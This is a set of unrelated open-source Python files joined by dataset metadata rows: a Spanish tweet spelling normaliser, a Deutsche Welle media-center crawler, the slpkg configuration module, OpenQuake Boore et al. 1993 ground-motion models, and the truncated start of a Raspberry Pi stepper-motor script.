result = re.sub(r'it([ao])', r'ill\1',
result, flags=re.U)
elif change in [u'a', u'o']:
result = result[:-1] + change
else:
diminutives.append(result)
diminutives = np.unique(diminutives).tolist()
if len(diminutives) == 1:
target_words.append(diminutives[0])
elif len(diminutives) > 1:
longest_match_ratios = np.zeros(len(diminutives))
for i, diminutive in enumerate(diminutives):
longest_match_ratios[i] =\
_compute_longest_common_subsequence_ratio(
word, diminutive, False, True)
target_words.append(diminutives[longest_match_ratios.argmax()])
return np.unique(target_words).tolist()
def _filter_out_acronyms(variants, target_words, max_length):
'''Filtra palabras objetivo identificadas como acrónimos.
Un acrónimo es definido como una palabra compuesta de sólo
consonantes (es decir, sin vocales).
NOTA: esta definición es parcial.
Así, descarta acrónimos que no coinciden con alguna de las
variantes normalizadas (a una y dos repeticiones) de la pa-
labra objetivo.
'''
remove_idx = []
for i, target in enumerate(target_words):
target = _to_unicode(target)
if (max_length < 5
and (target == target.upper() or not VOWELS_RE.search(target))
and target.lower() not in variants):
remove_idx.append(i)
for i in reversed(remove_idx):
target_words.pop(i)
return target_words
def _are_target_words_only_acronyms(target_words):
"""Determina si las palabras sugeridas sólo consisten de acrónimos.
Es un acrónimo aun si está en minúscula, pero no tiene vocal.
"""
validation = True
for target in target_words:
target = _to_unicode(target)
if target.upper() != target and VOWELS_RE.search(target[1:]):
validation = False
break
return validation
def _are_target_words_only_proper_nouns(target_words):
"""Evalúa si las palabras sugeridas son sólo PNDs.
Aun si está en minúscula y no tiene vocal, se considera una variante
de acrónimo, y por lo tanto PND.
"""
validation = True
for target in target_words:
target = _to_unicode(target)
if target.lower() == target and VOWELS_RE.search(target):
validation = False
break
return validation
def _suggest_target_words(word, case_type, external_dicc=None):
"""Sugiere variantes aceptadas (in-vocabulary) de acuerdo al token dado.
Las variantes se producen en cascada; así, si no se generan candidatas en un
nivel, se busca en el siguiente. Si ningún nivel produce variantes, la pala-
bra misma es devuelta.
paráms:
word: unicode
Palabra que (probablemente) está fuera del vocabulario.
Debe estar en minúscula y los caracteres por fuera del alfabeto, nor-
malizados a su representación en ASCII.
case_type: int
Cómo, en mayúsculas/minúsculas, está formada la OOV originalmente.
external_dicc: dict
Diccionario de normalización dependiente de contexto, es decir, ex-
terno. (Véase la explicación [1] en el método `__init__´ de la clase
`SpellTweet´).
"""
# variantes normalizadas a una o dos repeticiones de la palabra
min_length, max_length = 0, 0
normalised_variants = []
for normalised_f in _foma_string_lookup(word, 'length_normalisation-2'):
normalised_f = _deaccent(_to_unicode(normalised_f).lower())
if min_length == 0 or len(normalised_f) < min_length:
min_length = len(normalised_f)
if len(normalised_f) > max_length:
max_length = len(normalised_f)
if normalised_f not in normalised_variants:
normalised_variants.append(normalised_f)
normalised_variants = np.unique(normalised_variants).tolist()
target_words = []
# candidatas siendo la misma OOV.
# Se tiene en cuenta como estaba escrita originalmente.
oov_candidates = [word]
if case_type != 0:
oov_candidates.append(
_recover_original_word_case_from_type(word, case_type))
# 1. Generación de variantes primarias:
# (Pre:) Normalización de repetición de caracteres.
# Estas variantes son "marcadas" con alguno de los siguientes sufijos:
# _LAUGH: interjección de risa (por ej.: ja, je, ..., ju).
# Note que esta es una variación, y por lo tanto, se provee
# la correspondiente normalización.
# _EMO: emoticón.
# Note que esta no es una variación; se trata de un NoEs (no espa-
# ñol) y por lo tanto se devuelve la forma misma.
# _NORM: variante encontrada en el diccionario de normalización.
# Note que esta es una variación, y por lo tanto, se provee
# la correspondiente normalización.
primary_variants = _foma_string_lookup(word, 'primary_variants')
for variant in primary_variants:
s = re.search(r"(.+?)_((?:emo)|(?:inter)|(?:laugh)|(?:norm))$",
variant, re.I|re.U)
if s and s.group(2).lower() != 'emo':
target_words.append(s.group(1))
elif s:
target_words.append('%' + s.group(2))
break
if len(target_words) > 0:
return target_words
elif external_dicc is not None:
original_word = _recover_original_word_case_from_type(word, case_type)
external_suggestions = _foma_string_lookup(
original_word, 'external-dicc', external_dicc)
target_words = external_suggestions
if len(target_words) > 0:
return target_words
# Dictionary lookup
target_words = _transducers_cascade(word, ['dictionary_lookup', 'es-dicc'])
target_words = _filter_target_words_by_length(target_words)
# Buscar si alguna de las palabras candidatas del diccionario
# hace también parte del gazetteer de nombres propios
aux_target_words = []
for candidate in target_words:
aux_target_words += _foma_string_lookup(
_recover_original_word_case_from_type(candidate, 1), 'pnd-gazetteer')
target_words += aux_target_words
if len(target_words) > 0:
return np.unique(target_words).tolist()
# 2. Generación de variantes secundarias:
# (Pre:) Normalización de repetición de caracteres.
# Estas variantes corresponden a palabras que suenan igual a la OOV, y
# pueden ser entradas del diccionario o del gazetteer de PNDs.
# Para identificar PNDs, la OOV se normaliza de repetición de caracteres
# y se realiza conversión grafema/fonema.
target_words = _foma_string_lookup(word, 'secondary_variants-dicc')
target_words += _check_affixes(word, normalised_variants)
target_words = _filter_target_words_by_length(target_words)
target_words += _transducers_cascade(word,
['length_normalisation', 'phonology', 'pnd-gazetteer-fonemas'])
# No se generan variantes de tercer nivel si las generadas en este nivel
# son palabras y/o nombres propios (conformados por al menos una vocal).
# Si son solo nombres propios, una de estas candidatas debe tener un LCSR
# igual o superior a .55
filtering_PNDs = [
_compute_longest_common_subsequence_ratio(word, candidate, True) >= .55
for candidate in target_words]
num_filtered_candidates = sum([1 if v_ else 0 for v_ in filtering_PNDs])
if (len(target_words) > 0
and (not _are_target_words_only_proper_nouns(target_words)
or (not _are_target_words_only_acronyms(target_words)
and num_filtered_candidates > 0))):
target_words += oov_candidates
target_words = np.unique(target_words).tolist()
return _filter_out_acronyms(normalised_variants,
target_words,
max_length)
# 3. Generación de variantes terciarias:
# (Pre:)
# + Normalización de repetición de caracteres.
# + Remover tildes.
# + Inserción de una sola vocal en cualquier posición de la palabra.
# Esto representa a la escritura consonontal.
# NOTA: no se utiliza para la generación de IV-candidates, ni en la
# separación de palabras fusionadas.
# + Agregar tildes.
# Las variantes se generan así:
# 1. Palabras del diccionario estándar o entradas del gazetteer de PNDs
# que están a una distancia de edición de 1 (sustitución, reemplazo
# e inserción).
# 2. Palabras de la lista de IV-candidates que suenan igual.
# 3. Separación de palabras unidas. Esta separación se da fonemas.
target_words += _foma_string_lookup(word, 'tertiary_variants-dicc')
target_words = _filter_target_words_by_length(target_words)
target_words += _transducers_cascade(
_foma_string_lookup(word, 'tertiary_variants-pnd'),
['pnd-gazetteer-case'])
target_words += _transducers_cascade(word,
['length_normalisation', 'phonology', 'iv-candidates-fonemas'])
fused_words = []
if min_length > 3:
LOCK.acquire()
try:
# http://stackoverflow.com/questions/8464391
with Timeout(2):
fused_words = _foma_string_lookup(word, 'split-words')
if len(fused_words) > 0:
fused_words = _select_non_fused_words(fused_words)
except Timeout.Timeout:
fused_words = []
_switch_flookup_server('split-words', mode='on')
LOCK.release()
LCSR = .55
if min_length == 2:
LCSR = .5
target_words = _filter_out_acronyms(normalised_variants,
np.unique(target_words).tolist(),
max_length)
target_words = _filter_target_words_based_on_LCSR(word, target_words, LCSR)
target_words += oov_candidates
return np.unique(target_words).tolist() + np.unique(fused_words).tolist()
def _switch_normalisation_services(mode='on'):
'''Inicia/termina los servicios requeridos por el modelo.'''
_switch_flookup_server(mode=mode)
_switch_freeling_server(mode=mode)
class SpellTweet(object):
'''Analiza el texto del tweet e identifica OOV-words y sugiere correctas.'''
def __init__(self, external_dicc_ip=None, external_dicc_port=None):
"""Instancia un modelo de normalización léxica.
paráms:
external_dicc_ip: str
Dirección IP (v4) del diccionario de normalización dependiente
de contexto. Nótese que tal diccionario es externo. (Véase [1]).
external_dicc_port: str
Puerto por medio de cual se reciben las solicitudes para el di-
ccionario de normalización.
[1] `external_dicc_ip´ y `external_dicc_port´ permiten especificar un
diccionario de normalización dependiente de contexto, es decir, externo.
Tal diccionario corresponde a un transductor de estado finito que reci-
be solicitudes por medio de una instancia de servidor.
"""
self.language_model = kenlm.LanguageModel(CORPORA['eswiki-corpus-3-grams'])
self.external_dicc = None
if external_dicc_ip is not None and external_dicc_port is not None:
self.external_dicc = {
'external-dicc': [None, external_dicc_ip, external_dicc_port],}
def list_oov_words(self, morphological_analysis, include_PND=True):
"""Lista las OOV-words identificadas.
La identificación es dada porque, o bien la palabra no recibió
ningún análisis, o es reconocida como nombre propio (su tag
empieza por NP). Este segundo caso se da porque algunos tweets
son escritos total o parcialmente en mayúscula.
paráms:
include_PND: bool
indica si los PND identificados serán tratados como OOV-words.
Retorna un array con la siguiente estructura:
0 -> sentencia (u oración) en la que aparece.
1 -> posición que ocupa en la sentencia.
2 -> tipo de mayúscula/minúscula:
(véase el método "_get_case_type_in_token")
0 -> completamente en minúscula.
1 -> con la inicial en mayúscula.
2 -> totalmente o con la mayoría de sus letras en mayúscula.
3 -> forma original de la palabra.
4 -> forma en minúsculas de la palabra, decodificada a ASCII
si alguna de sus letras no es reconocida.
5 -> indica si la palabra debe comenzar con mayúscula:
- si es el inicio de una oración
- si va después de un punto seguido,
o signos de interrogación o admiración
- si va después de puntos suspensivos, y la
oov-word empieza con mayúscula
"""
oov_words = []
starts_with_uppercase = False
for i, sentence in enumerate(morphological_analysis):
j, k = 0, 0
for form, lemma, tag in sentence:
if j == 0:
starts_with_uppercase = True
# si el token anterior son puntos suspensivos, y el token actual
# empieza en mayúscula, entonces la forma corregida, si se trata
# de una oov, debe empezar con mayúscula
if (k > 0 and morphological_analysis[i][k-1][2].startswith(u'F')
and re.match(r'\.{3,}$', morphological_analysis[i][k-1][0], re.U)
and form[0].upper() == form[0]):
starts_with_uppercase = True
if lemma == '' and tag == '':
oov_words.append([i, j, _get_case_type_in_token(form),
form, _normalize_unknown_symbols(form).lower(),
starts_with_uppercase])
starts_with_uppercase = False
elif (include_PND and tag.startswith('NP')
and not re.match('(?:#|@)', form, re.U)):
for token in form.split('_'):
# si el token está en minúscula y está en el
# diccionario, descartarlo
if (token.lower() == token and
len(_foma_string_lookup(token, 'es-dicc')) == 1):
j += 1
starts_with_uppercase = False
continue
oov_words.append([i, j, _get_case_type_in_token(token),
token, _normalize_unknown_symbols(token).lower(),
starts_with_uppercase])
j += 1
starts_with_uppercase = False
j -= 1
elif tag.startswith(u'F'):
if tag.lower() in [u'fat', u'fit', u'fp']:
starts_with_uppercase = True
else:
starts_with_uppercase = False
j += 1
k += 1
# Si la oov-word inicia en mayúscula (o inclusive, está completamente en
# mayúscula), y es encontrada en el diccionario, se deja a ella misma.
for i, oov_word in enumerate(oov_words):
if oov_word[2] == 0:
continue
search = _transducers_cascade(
oov_word[3].lower(),
['dictionary_lookup', 'es-dicc'])
if len(search) == 0:
# búsqueda de pronombre enclítico
affixes_search = _check_affixes(
oov_word[3].lower(), [oov_word[3].lower()],
affix='suffix', what_affix='enclitic')
if (oov_word[3].lower() in affixes_search
and len(affixes_search) == 1):
search.append(oov_word[3].lower())
# busqueda de adverbios terminados en -mente
search += _check_affixes(
oov_word[3].lower(), [oov_word[3].lower()],
affix='suffix', what_affix='mente')
search =_filter_target_words_by_length(search)
if (len(search) == 1
and _to_unicode(search[0]).lower() == oov_word[3].lower()):
oov_words[i].append([oov_word[3].lower()])
oov_words[i][2] = 0
if oov_words[i][5]:
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_words[i][6][0], 1)
return oov_words
def select_candidates(self, analysis, oov_words):
'''Selecciona los mejores candidatos.'''
tweet = u''
j = 1
for i, sentence in enumerate(analysis):
for form, lemma, tag in sentence:
if len(tag) == 0:
tweet = tweet + u' ' + (u'{OOV-%d}' % j) + u' '
j += 1
elif tag.startswith(u'NP') and not form.startswith((u'#', u'@')):
for token in form.split('_'):
if (token.lower() == token
and len(_foma_string_lookup(token, 'es-dicc')) == 1):
tweet = tweet + u' ' + token + u' '
else:
tweet = tweet + u' ' + (u'{OOV-%d}' % j) + u' '
j += 1
elif form.startswith((u'#', u'@')) or not tag.startswith(u'F'):
if tag.startswith((u'Z', u'W')):
form = re.sub(
u"""[^a-z\xe1\xe9\xed\xf3\xfa\xfc\xf1_]""", '',
form, flags=re.I|re.U)
if len(form) < 2:
continue
elif not tag.startswith(u'NP'):
form = form.lower()
tweet = tweet + u' ' + form + u' '
tweet = tweet.strip().replace(u' ', u' ').replace(u'jajaja', u'ja')
possible_concatenated_words = False
param_grid = {}
for i, oov_word in enumerate(oov_words):
if len(oov_word[6]) == 1 and oov_word[6][0] != '%EMO':
tweet = tweet.replace(u'{OOV-%d}' % (i + 1), oov_word[6][0])
elif len(oov_word[6]) == 1:
tweet = tweet.replace(u'{OOV-%d}' % (i + 1), oov_word[3])
oov_words[i][6] = [oov_word[3]]
else:
param_grid['OOV-%i' % (i + 1)] = np.unique(oov_word[-1]).tolist()
if not possible_concatenated_words:
for candidate in param_grid['OOV-%i' % (i + 1)]:
if '_' in candidate:
possible_concatenated_words = True
grid = ParameterGrid(param_grid)
complete_search = True
best_combination = []
max_ppl_value = 1000
for i, combination in enumerate(grid):
if i == 100000:
complete_search = False
break
t = tweet
for oov_id, candidate in combination.iteritems():
t = t.replace('{' + oov_id + '}', candidate.replace('_', ' '))
# si solo se va a normalizar un token, des-
# activar el inicio y fin de la oración
bos = True
eos = True
if len(t.split(' ')) == 1 and not possible_concatenated_words:
bos = False
eos = False
ppl_value = self.language_model.score(t, bos=bos, eos=eos)
if max_ppl_value == 1000 or ppl_value > max_ppl_value:
best_combination = combination
max_ppl_value = ppl_value
else:
for oov, candidate in best_combination.iteritems():
oov_id = int(oov.split('-')[1]) - 1
idx = oov_words[oov_id][6].index(candidate)
oov_words[oov_id][6] = [oov_words[oov_id][6][idx]]
if not complete_search:
for i in xrange(len(oov_words)):
if len(oov_words[i][6]) == 1:
continue
t = tweet
for j in xrange(len(oov_words)):
if i == j:
continue
elif len(oov_words[j][6]) > 1:
t = t.replace('{OOV-%i}' % (j + 1), oov_words[j][3])
ppl_values = np.zeros(len(oov_words[i][6]), dtype=float)
for k, candidate in enumerate(oov_words[i][6]):
ppl_values[k] = self.language_model.score(
t.replace('{OOV-%i}' % (i + 1), candidate))
best_candidate_idx = np.argmax(ppl_values)
oov_words[i][6] = [oov_words[i][6][best_candidate_idx]]
tweet = tweet.replace('{OOV-%i}' % (i + 1), oov_words[i][6][0])
# Mayúsculas: a continuación se identifica la forma correcta de la
# palabra candidata seleccionada, según mayúsculas y minúsculas.
# Las siguientes son las reglas:
# 1. Si la palabra candidata seleccionada empieza por mayúscula (o in-
# clusive, está completamente en mayúscula), así se mantiene.
# 2. Si la palabra candidata seleccionada está en minúscula, no está
# en el diccionario de formas estándar y corresponde a la misma
# oov-word, y no , se recupera las mayúscula según como estaba ori-
# ginalmente.
# 3. Si la palabra candidata seleccionada está en minúscula, y es di-
# ferente de la oov-word, se recuperará su mayúscula si está
# al inicio de la oración, después de un punto seguido o signos de
# puntación o interrogación.
# Aplicación de la reglas
# (Note que la primera no es necesario implementarla)
for i, oov_word in enumerate(oov_words):
if (oov_word[3].lower() == oov_word[6][0]):
if len(_foma_string_lookup(oov_word[6][0], 'es-dicc')) == 0:
# segunda regla
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_word[6][0], oov_word[2])
elif oov_word[5]:
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_word[6][0], 1)
elif (oov_word[3].lower() != oov_word[6][0]
and oov_word[6][0].lower() == oov_word[6][0]
and oov_word[5]):
# tercera regla
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_word[6][0], 1)
return oov_words
def spell_tweet(self, text):
'''Analiza léxicamente un tweet y lo corrige, si es necesario.
paráms:
text: str
Texto del tweet.
only_suggest_candidates: bool
Si es verdadero, sólo retorna las candidatas por cada OOV
identificada.
salida:
candidatas_seleccionadas: list
Arreglo con las oov-words identificadas y las candidatas
seleccionadas. Un arrego por cada OOV, siendo la estruc-
tura la siguiente:
0, sentencia (u oración) en la que aparece.
1, posición que ocupa en la sentencia.
2, forma original de la palabra.
3, candidata seleccionada.
4, candidatas sugeridas.
'''
if text=='':
raise Exception('Debe especificar un texto a normalizar')
else:
text = _to_unicode(text)
analysis = _analyze_morphologically(text)
oov_words = self.list_oov_words(analysis)
# por cada palabra fuera de vocabulario, proponer candidatas
pool = multiprocessing.Pool(processes=4)
candidates = [
[i, pool.apply_async(_suggest_target_words, [oov_word[4], oov_word[2], self.external_dicc])]
for i, oov_word in enumerate(oov_words) if len(oov_word) == 6]
pool.close()
pool.join()
normalisation_candidates = {}
for i, target_words in candidates:
try:
oov_words[i].append(target_words.get(timeout=3))
except (ValueError, multiprocessing.TimeoutError):
oov_words[i].append(
np.unique([
oov_words[i][3],
oov_words[i][4],
_recover_original_word_case_from_type(
oov_words[i][4], oov_words[i][2])
]).tolist())
_switch_flookup_server(mode='on')
normalisation_candidates[i] = oov_words[i][6]
oov_words = self.select_candidates(analysis, oov_words)
for i, oov in enumerate(oov_words):
if i not in normalisation_candidates.keys():
normalisation_candidates[i] = []
oov_words[i] = [oov[0], oov[1], oov[3], oov[6][0],
np.unique(normalisation_candidates[i] + oov[6]).tolist()]
return oov_words
| mit | -1,392,678,479,065,251,600 | 38.590456 | 104 | 0.561087 | false | 3.379849 | false | false | false |
EUMSSI/EUMSSI-platform | crawlers/DW-import/DW-api-video-crawler.py | 1 | 3632 | #!/usr/bin/env python
import uuid
import ConfigParser
import pymongo
import json
import requests
import sys, os
from os.path import isdir, join
import urllib2
from bs4 import BeautifulSoup
class ItemWriter:
def __init__(self, source, meta_format):
self.mongo_client = pymongo.MongoClient()
self.db = self.mongo_client['eumssi_db']
self.col = self.db['content_items']
self.source = source
self.format = meta_format
def write_item(self, item):
''' write item to MongoDB '''
try:
twuid = uuid.uuid4()
print "inserted: ", self.col.insert({'_id':uuid.uuid4(),'source':self.source,'meta':{'original':item, 'original_format':self.format},'processing':{'queues':{'metadata':'pending'}}})
except Exception as e:
print e
def find_item(self, item):
try:
cursor = self.col.find({'meta.original.reference.id': item['reference']['id']})
for i in cursor:
return "1"
except Exception as e:
print "exception: " , e
return None
def get_number_of_page(code):
host = "http://www.dw.com/api/list/mediacenter/" + str(code) + "?pageIndex=1"
geninf = json.loads(urllib2.urlopen(host).read())
return geninf['paginationInfo']['availablePages']
def getFullText(url):
r = urllib2.urlopen(url)
httpcont = r.read()
soup = BeautifulSoup(httpcont, 'html.parser')
intro = soup.findAll('p', {'class': 'intro'})
text = soup.findAll('div', {'class': 'longText'})
result = ""
if len(intro)>0:
result += intro[0].text
if len(text)>0:
result += text[0].text
return result
'''
Extract items and insert to DB
'''
def fetch_data(language, duplicatecheck):
''' default values '''
code = 2
if language == 'es':
code = 28
if language == 'de':
code = 1
if language == 'fr':
code = 13
number_of_page = get_number_of_page(code)
if number_of_page is None:
return
icounter = 0
for i in range(1, number_of_page+1):
host = "http://www.dw.com/api/list/mediacenter/" + str(code) + "?pageIndex=" + str(i)
try:
itemset = json.loads(urllib2.urlopen(host).read())
#write data to mongo db
writer_video = ItemWriter('DW video','DW-MediaCenter-api')
writer_audio = ItemWriter('DW audio','DW-MediaCenter-api')
for item in itemset['items']:
tmp = None
if duplicatecheck=='1':
tmp = writer.find_item(item)
if tmp is None:
item['language'] = language
icounter+=1
itemdetail = json.loads(urllib2.urlopen(item['reference']['url']).read())
item['details'] = itemdetail
item['text'] = getFullText(itemdetail['permaLink'])
if len(item['text'])<100: #exceptional case
item['text'] = item['teaserText']
if 'type' in item:
if item['type']=='AudioTeaser':
writer_audio.write_item(item)
else:
if item['type']=='VideoTeaser':
writer_video.write_item(item)
else:
print 'item ', item['reference']['id'], 'exists in db already!'
except Exception as e:
print host
print e
if __name__ == '__main__':
print '!-----------------------------------------------------'
print '!@usage: python [me] language duplicatecheck\n!\t--language: en,es,fr,de\n!\t--duplicatecheck:1 (check),0 (no check)'
print '!-----------------------------------------------------'
language = sys.argv[1]
duplicatecheck = sys.argv[2]
print 'Now fetching data for ', language, ' with the duplicate check option: ', duplicatecheck
fetch_data(language, duplicatecheck)
| apache-2.0 | -4,000,235,398,634,655,000 | 30.042735 | 187 | 0.591685 | false | 3.606753 | false | false | false |
BrentonEarl/slpkg | slpkg/config.py | 1 | 3003 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# config.py file is part of slpkg.
# Copyright 2014-2015 Dimitris Zlatanidis <[email protected]>
# All rights reserved.
# Slpkg is a user-friendly package manager for Slackware installations
# https://github.com/dslackw/slpkg
# Slpkg is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import shutil
import filecmp
import subprocess
from slpkg.utils import Utils
from slpkg.__metadata__ import MetaData as _meta_
class Config(object):
"""Print or edit slpkg configuration file
"""
def __init__(self):
self.config_file = "/etc/slpkg/slpkg.conf"
self.meta = _meta_
def view(self):
"""View slpkg config file
"""
print("") # new line at start
conf_args = [
"RELEASE",
"BUILD_PATH",
"PACKAGES",
"PATCHES",
"CHECKMD5",
"DEL_ALL",
"DEL_BUILD",
"SBO_BUILD_LOG",
"MAKEFLAGS",
"DEFAULT_ANSWER",
"REMOVE_DEPS_ANSWER",
"SKIP_UNST",
"RSL_DEPS",
"DEL_DEPS",
"USE_COLORS",
"DOWNDER",
"DOWNDER_OPTIONS",
"SLACKPKG_LOG",
"ONLY_INSTALLED",
"PRG_BAR",
"EDITOR"
]
read_conf = Utils().read_file(self.config_file)
for line in read_conf.splitlines():
if not line.startswith("#") and line.split("=")[0] in conf_args:
print("{0}".format(line))
else:
print("{0}{1}{2}".format(self.meta.color["CYAN"], line,
self.meta.color["ENDC"]))
print("") # new line at end
def edit(self):
"""Edit configuration file
"""
subprocess.call("{0} {1}".format(self.meta.editor,
self.config_file), shell=True)
def reset(self):
"""Reset slpkg.conf file with default values
"""
shutil.copy2(self.config_file + ".orig", self.config_file)
if filecmp.cmp(self.config_file + ".orig", self.config_file):
print("{0}The reset was done{1}".format(
self.meta.color["GREEN"], self.meta.color["ENDC"]))
else:
print("{0}Reset failed{1}".format(self.meta.color["RED"],
self.meta.color["ENDC"]))
| gpl-3.0 | 2,471,797,473,529,711,600 | 32 | 76 | 0.559108 | false | 3.930628 | true | false | false |
gem/oq-hazardlib | openquake/hazardlib/gsim/boore_1993.py | 1 | 7260 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2017 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Module exports :class:`BooreEtAl1993GSCBest`,
:class:`BooreEtAl1993GSCUpperLimit`, :class:`BooreEtAl1993GSCLowerLimit`.
"""
from __future__ import division
import numpy as np
from scipy.constants import g
from openquake.hazardlib.gsim.base import GMPE, CoeffsTable
from openquake.hazardlib import const
from openquake.hazardlib.imt import PGA, SA
class BooreEtAl1993GSCBest(GMPE):
"""
Implement equation used by the Geological Survey of Canada (GSC) for
the 2010 Western Canada National Seismic Hazard Model. The class implements
the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
("Estimation of Response Spectra and Peak Accelerations from Western North
American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
Open File Report 93-509).
Equation coefficients provided by GSC for the random horizontal component
and corresponding to the 'Best' case (that is mean unaffected)
"""
#: Supported tectonic region type is active shallow crust, given
#: that the equations have been derived for Western North America
DEFINED_FOR_TECTONIC_REGION_TYPE = const.TRT.ACTIVE_SHALLOW_CRUST
#: Supported intensity measure types are spectral acceleration,
#: and peak ground acceleration
DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([
PGA,
SA
])
#: Supported intensity measure component is random horizontal
#: :attr:`~openquake.hazardlib.const.IMC.RANDOM_HORIZONTAL`,
DEFINED_FOR_INTENSITY_MEASURE_COMPONENT = const.IMC.RANDOM_HORIZONTAL
#: Supported standard deviation type is total
DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([
const.StdDev.TOTAL
])
#: site params are not required
REQUIRES_SITES_PARAMETERS = set()
#: Required rupture parameter is magnitude
REQUIRES_RUPTURE_PARAMETERS = set(('mag', ))
#: Required distance measure is Rjb distance
#: see paragraph 'Predictor Variables', page 6.
REQUIRES_DISTANCES = set(('rjb', ))
def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types):
"""
See :meth:`superclass method
<.base.GroundShakingIntensityModel.get_mean_and_stddevs>`
for spec of input and result values.
"""
C = self.COEFFS[imt]
mag = rup.mag - 6
d = np.sqrt(dists.rjb ** 2 + C['c7'] ** 2)
mean = np.zeros_like(d)
mean += C['c1'] + C['c2'] * mag + C['c3'] * mag ** 2 + C['c6']
idx = d <= 100.
mean[idx] = mean[idx] + C['c5'] * np.log10(d[idx])
idx = d > 100.
mean[idx] = (mean[idx] + C['c5'] * np.log10(100.) -
np.log10(d[idx] / 100.) + C['c4'] * (d[idx] - 100.))
# convert from log10 to ln and from cm/s**2 to g
mean = np.log((10.0 ** (mean - 2.0)) / g)
stddevs = self._get_stddevs(C, stddev_types, dists.rjb.shape[0])
return mean, stddevs
def _get_stddevs(self, C, stddev_types, num_sites):
"""
Return total standard deviation.
"""
assert all(stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
for stddev_type in stddev_types)
stddevs = [np.zeros(num_sites) + C['sigma'] for _ in stddev_types]
return stddevs
#: coefficient table provided by GSC
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c2 c3 c4 c5 c6 c7 sigma
pga 2.887 0.229 0.0 -0.00326 -0.778 0.162 5.57 0.529
0.1 3.451 0.327 -0.098 -0.00395 -0.934 0.046 6.27 0.479
0.2 3.464 0.309 -0.090 -0.00259 -0.924 0.190 7.02 0.495
0.3 3.295 0.334 -0.070 -0.00202 -0.893 0.239 5.94 0.520
0.5 2.980 0.384 -0.039 -0.00148 -0.846 0.279 4.13 0.562
1.0 2.522 0.450 -0.014 -0.00097 -0.798 0.314 2.90 0.622
2.0 2.234 0.471 -0.037 -0.00064 -0.812 0.360 5.85 0.675
""")
class BooreEtAl1993GSCUpperLimit(BooreEtAl1993GSCBest):
"""
Implement equation used by the Geological Survey of Canada (GSC) for
the 2010 Western Canada National Seismic Hazard Model. The class implements
the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
("Estimation of Response Spectra and Peak Accelerations from Western North
American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
Open File Report 93-509).
Equation coefficients provided by GSC for the random horizontal component
and corresponding to the 'Upper Limit' case (that is mean value + 0.7 nat
log)
"""
#: coefficient table provided by GSC
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c2 c3 c4 c5 c6 c7 sigma
pga 3.187 0.229 0.0 -0.00326 -0.778 0.162 5.57 0.529
0.1 3.751 0.327 -0.098 -0.00395 -0.934 0.046 6.27 0.479
0.2 3.764 0.309 -0.090 -0.00259 -0.924 0.190 7.02 0.495
0.3 3.595 0.334 -0.070 -0.00202 -0.893 0.239 5.94 0.520
0.5 3.280 0.384 -0.039 -0.00148 -0.846 0.279 4.13 0.562
1.0 2.822 0.450 -0.014 -0.00097 -0.798 0.314 2.90 0.622
2.0 2.534 0.471 -0.037 -0.00064 -0.812 0.360 5.85 0.675
""")
class BooreEtAl1993GSCLowerLimit(BooreEtAl1993GSCBest):
"""
Implement equation used by the Geological Survey of Canada (GSC) for
the 2010 Western Canada National Seismic Hazard Model. The class implements
the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
("Estimation of Response Spectra and Peak Accelerations from Western North
American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
Open File Report 93-509).
Equation coefficients provided by GSC for the random horizontal component
and corresponding to the 'Lower Limit' case (that is mean value - 0.7 nat
log)
"""
#: coefficient table provided by GSC
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c2 c3 c4 c5 c6 c7 sigma
pga 2.587 0.229 0.0 -0.00326 -0.778 0.162 5.57 0.529
0.1 3.151 0.327 -0.098 -0.00395 -0.934 0.046 6.27 0.479
0.2 3.164 0.309 -0.090 -0.00259 -0.924 0.190 7.02 0.495
0.3 2.995 0.334 -0.070 -0.00202 -0.893 0.239 5.94 0.520
0.5 2.680 0.384 -0.039 -0.00148 -0.846 0.279 4.13 0.562
1.0 2.222 0.450 -0.014 -0.00097 -0.798 0.314 2.90 0.622
2.0 1.934 0.471 -0.037 -0.00064 -0.812 0.360 5.85 0.675
""")
| agpl-3.0 | -6,444,127,054,750,756,000 | 40.965318 | 79 | 0.637741 | false | 2.854896 | false | false | false |
kscottz/SkinnerBox | util/stepper.py | 1 | 1710 | import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
enable_pin = 27 #18
coil_A_2_pin = 18 #23 #17
coil_A_1_pin = 23 #18 #4
coil_B_1_pin = 25 #23
coil_B_2_pin = 24 #24
GPIO.setup(enable_pin, GPIO.OUT)
GPIO.setup(coil_A_1_pin, GPIO.OUT)
GPIO.setup(coil_A_2_pin, GPIO.OUT)
GPIO.setup(coil_B_1_pin, GPIO.OUT)
GPIO.setup(coil_B_2_pin, GPIO.OUT)
GPIO.output(enable_pin, 1)
def forward(delay, steps):
for i in range(0, steps):
# setStep(1,0,1,0)
